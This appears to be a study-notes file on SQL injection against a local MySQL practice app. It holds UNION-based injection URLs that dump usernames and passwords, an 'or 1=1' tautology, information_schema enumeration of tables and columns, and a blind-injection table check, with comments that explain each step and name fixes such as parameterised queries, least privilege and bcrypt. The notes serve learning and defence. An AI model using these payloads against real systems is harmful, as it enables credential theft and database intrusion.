http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//查询所有数据：id 的值被直接拼接进 SQL 语句，or 1=1 使 WHERE 条件恒为真，所以返回全部行；对 id 使用参数化查询并校验为整数即可避免
http://localhost/index.php?id=0 or 1=1
--UNION注入破解用户名密码
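-- Database (schema) names. TABLES holds one row per table, so a schema name
-- repeats once for every table it contains.
-- In MySQL, information_schema lists only the objects the connected account
-- has privileges on, so a least-privilege application account limits what
-- this query can reveal.
-- Fixed: the stray space inside "information_schema" made the identifier
-- invalid, and the trailing "//" note was not a SQL comment.
select TABLE_SCHEMA FROM information_schema.TABLES;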
//枚举表名（从 information_schema.TABLES 读取，并非猜测）；MySQL 中 information_schema 只显示当前账号有权限访问的对象，应用的数据库账号应只授予最小权限
http://localhost/index.php?id=33 UNION select 1,TABLE_NAME,3,4 FROM information_schema.TABLES where TABLE_SCHEMA='jokedb'
//枚举字段名（从 information_schema.columns 读取）
-- Column names of the users table in the jokedb schema, read from the
-- information_schema catalog.
SELECT
    column_name
FROM information_schema.columns
WHERE TABLE_NAME = 'users'
  AND TABLE_SCHEMA = 'jokedb';
//查询用户名密码；密码列应只保存加盐的慢哈希（如 bcrypt），这样即使被读出也不是明文
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//盲注函数
-- MySQL IF(condition, a, b) yields a when the condition is true and b
-- otherwise; 1 = 1 always holds, so this returns 'tiger'.
SELECT IF(1 = 1, 'tiger', 'monkey')
//猜表名是否存在
-- Presumably the application's lookup on region, with the request's id value
-- in place of 33 and the trailing condition appended to it; confirm against
-- index.php.
-- The statement raises an error when jokedb.xss does not exist. When the
-- table exists, rows come back only if it holds more than one row.
-- Binding id as a parameter keeps the trailing condition out of the
-- statement text.
SELECT *
FROM region
WHERE (id = 33)
  AND (SELECT COUNT(*) FROM jokedb.xss) > 1